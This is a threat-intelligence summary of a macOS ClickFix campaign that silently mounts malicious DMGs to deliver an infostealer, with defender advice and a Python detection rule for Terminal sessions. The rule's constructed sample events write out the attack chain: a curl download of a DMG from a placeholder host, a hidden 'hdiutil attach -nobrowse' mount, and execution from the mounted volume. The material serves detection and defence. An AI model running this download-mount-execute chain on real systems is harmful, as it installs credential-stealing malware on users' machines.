New macOS ClickFix attack silently mounts DMGs to push infostealer
Summary
A new macOS ClickFix campaign uses Terminal commands to silently download, mount, and launch info-stealing malware from malicious disk image (DMG) files. The attack targets macOS users by exploiting their trust in seemingly legitimate DMG files to deliver malware without requiring user interaction.
IFF Assessment
FOE
This article describes a new macOS attack campaign that silently installs infostealer malware, which is bad news for defenders.
Defender Context
macOS users should be wary of downloading and opening DMG files from untrusted sources, even if they appear legitimate. Defenders should monitor for unusual Terminal activity or unexpected file mounts, as this campaign highlights a sophisticated method of malware delivery.
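One way to turn the monitoring advice above into a check, as an added example that is not from the article: it correlates process-exec events per Terminal session and alerts when a DMG is attached hidden from Finder and a binary then runs from the mounted volume. The event schema and the sample events are constructed, and the use of `hdiutil attach -nobrowse` as the silent-mount step is an assumption, since the article does not name the command.

```python
import json
import shlex

TERMINAL = "/Terminal.app/Contents/MacOS/Terminal"

# Constructed process-exec events in a hypothetical schema (pid, ppid, path, args).
SAMPLE_EVENTS = """\
{"pid": 100, "ppid": 1, "path": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "args": "Terminal"}
{"pid": 101, "ppid": 100, "path": "/bin/zsh", "args": "-zsh"}
{"pid": 102, "ppid": 101, "path": "/usr/bin/curl", "args": "curl -fsSL -o /tmp/update.dmg https://example.invalid/update.dmg"}
{"pid": 103, "ppid": 101, "path": "/usr/bin/hdiutil", "args": "hdiutil attach -nobrowse -quiet /tmp/update.dmg"}
{"pid": 104, "ppid": 101, "path": "/Volumes/Update/Update.app/Contents/MacOS/Update", "args": "Update"}
{"pid": 300, "ppid": 1, "path": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "args": "Terminal"}
{"pid": 301, "ppid": 300, "path": "/bin/zsh", "args": "-zsh"}
{"pid": 302, "ppid": 301, "path": "/usr/bin/hdiutil", "args": "hdiutil attach /Users/a/Downloads/Installer.dmg"}
{"pid": 303, "ppid": 301, "path": "/Volumes/Installer/Installer.app/Contents/MacOS/Installer", "args": "Installer"}
"""

def session_root(pid, procs):
    """Walk the parent chain; return the Terminal pid this process descends from, else None."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        if procs[pid]["path"].endswith(TERMINAL):
            return pid
        pid = procs[pid]["ppid"]
    return None

def detect(jsonl):
    procs, sessions = {}, {}
    for line in jsonl.splitlines():  # events are assumed to arrive in time order
        ev = json.loads(line)
        procs[ev["pid"]] = ev
        root = session_root(ev["pid"], procs)
        if root is None or root == ev["pid"]:
            continue  # not started from Terminal, or Terminal itself
        s = sessions.setdefault(root, {"mounts": [], "signals": []})
        argv = shlex.split(ev["args"])
        name = ev["path"].rsplit("/", 1)[-1]
        if name == "hdiutil" and "attach" in argv and "-nobrowse" in argv:
            mp = argv[argv.index("-mountpoint") + 1] if "-mountpoint" in argv[:-1] else "/Volumes/"
            s["mounts"].append(mp.rstrip("/") + "/")  # where a hidden image may appear
            s["signals"].append("hidden-mount")
        elif name in ("curl", "wget") and any(a.lower().endswith(".dmg") for a in argv):
            s["signals"].append("dmg-download")
        elif any(ev["path"].startswith(m) for m in s["mounts"]):
            s["signals"].append("exec-from-mount:" + ev["path"])
    return {r: s["signals"] for r, s in sessions.items()  # alert: hidden mount, then exec from it
            if any(x.startswith("exec-from-mount") for x in s["signals"])}
```

The second constructed session (a normal, Finder-visible attach followed by launching the installer) produces no alert, which is the baseline the rule has to tolerate.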